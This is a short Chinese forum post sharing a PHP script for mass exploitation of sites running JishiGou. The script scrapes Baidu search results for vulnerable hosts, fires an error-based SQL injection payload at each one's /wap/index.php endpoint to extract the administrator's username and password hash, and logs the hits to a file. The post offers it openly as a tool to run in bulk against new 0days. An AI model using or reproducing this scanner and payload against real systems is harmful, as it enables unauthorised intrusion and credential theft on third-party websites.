贴出一个php的批量搜索吧

原理很简单，以后看着0day的时候都试着批量下吧，省事。。。。

<?php

$keyword='Powered by JishiGou' ; // 批量关键字  

$timeout = 40;
$stratpage =1;  //启始页

$lastpage = 10000;//终止页

for ($i=$stratpage ; $i<=$lastpage ; $i++ ){  
$array=ReadBaiduList($keyword,$timeout,$i);//百度搜索到的url保存到array数据
foreach ($array as $key=>$url ){//对数据遍历，看是否有漏洞
//echo $key;
$url_list=file('url.txt');
if (in_array("$url\r\n",$url_list)){//判断是否有重复的url

echo " repeat\n";
}else{
$fp = @fopen('url.txt', 'a');
@fwrite($fp, $url."\r\n");
@fclose($fp);
okbug($url);

}
   }
}
function okbug($host){ //这个提抓下包
$tmp = array();
$data = '';
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,'GET /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1'."\r\nHost:$host\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if(preg_match('/Duplicate entry(.)+for key/i',$data)) {

$i = strpos($data,'Duplicate entry');

$fp = @fopen('shell.txt', 'a');
@fwrite($fp, $host."   ".substr($data,$i+16,50)."\r\n");
@fclose($fp);
return         true;
}else{
return false;
}
}
function ReadBaiduList($keyword,$timeout,$nowpage)
{
$tmp = array();
//$data = '';
$nowpage = ($nowpage-1)*10;
//echo $nowpage;
$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage."&rn=100&usm=1 HTTP/1.1
Host: www.baidu.com
Connection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
//echo $date;
@fclose($fp);
preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);
$num = count($tmp[1]);
//echo $num;
$array = array();
for($i = 0;$i < $num;$i++)
{
//echo $i;
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}
?>